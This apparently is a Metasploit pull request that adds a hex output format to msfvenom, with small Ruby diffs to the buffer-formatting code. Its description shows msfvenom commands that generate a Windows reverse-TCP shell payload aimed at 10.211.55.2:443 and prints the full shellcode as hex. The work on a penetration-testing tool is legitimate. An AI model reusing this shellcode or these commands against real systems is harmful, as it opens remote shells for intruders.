### PR TITLE
add new hex format to msfvenom

### DIFF
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -25,6 +25,8 @@ module Buffer
       when 'raw'
       when 'num'
         buf = Rex::Text.to_num(buf)
+      when 'hex'
+        buf = Rex::Text.to_hex(buf, '') << "\n"
       when 'dword', 'dw'
         buf = Rex::Text.to_dword(buf)
       when 'python', 'py'
@@ -65,7 +67,7 @@ module Buffer
   def self.comment(buf, fmt = "ruby")
     case fmt
       when 'raw'
-      when 'num', 'dword', 'dw'
+      when 'num', 'dword', 'dw', 'hex'
         buf = Rex::Text.to_js_comment(buf)
       when 'ruby', 'rb', 'python', 'py'
         buf = Rex::Text.to_ruby_comment(buf)
@@ -98,6 +100,7 @@ module Buffer
       'csharp',
       'dw',
       'dword',
+      'hex',
       'java',
       'js_be',
       'js_le',

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -26,7 +26,7 @@ module Buffer
       when 'num'
         buf = Rex::Text.to_num(buf)
       when 'hex'
-        buf = Rex::Text.to_hex(buf, '') + "\n"
+        buf = Rex::Text.to_hex(buf, '')
       when 'dword', 'dw'
         buf = Rex::Text.to_dword(buf)
       when 'python', 'py'

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -26,7 +26,7 @@ module Buffer
       when 'num'
         buf = Rex::Text.to_num(buf)
       when 'hex'
-        buf = Rex::Text.to_hex(buf, '') << "\n"
+        buf = Rex::Text.to_hex(buf, '') + "\n"
       when 'dword', 'dw'
         buf = Rex::Text.to_dword(buf)
       when 'python', 'py'

--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1810,4 +1810,3 @@ protected
 
 end
 end
-

--- a/msfvenom
+++ b/msfvenom
@@ -331,6 +331,8 @@ if __FILE__ == $0
     output_stream = $stdout
     output_stream.binmode
     output_stream.write payload
+    # trailing newline for pretty output
+    $stderr.puts unless payload =~ /\n$/
   end
 
 end


### PR DESCRIPTION
this pr adds a new HEX format to msvenom to generate a hex string of the payload. The string can be used for example in ollydbg for binary-paste

Manual check of raw vs. hex:

RAW:

```
./msfvenom -p windows/shell/reverse_tcp -f raw -e generic/none -a x86 --platform Windows LPORT=443 LHOST=10.211.55.2 | hexdump -C | grep -v 00000119 | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 281 (iteration=0)
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a05680ad3370268020001bb89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd501c329c675eec3
```

HEX:

```
./msfvenom -p windows/shell/reverse_tcp -f hex -e generic/none -a x86 --platform Windows LPORT=443 LHOST=10.211.55.2
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 281 (iteration=0)
fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a05680ad3370268020001bb89e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd501c329c675eec3
```
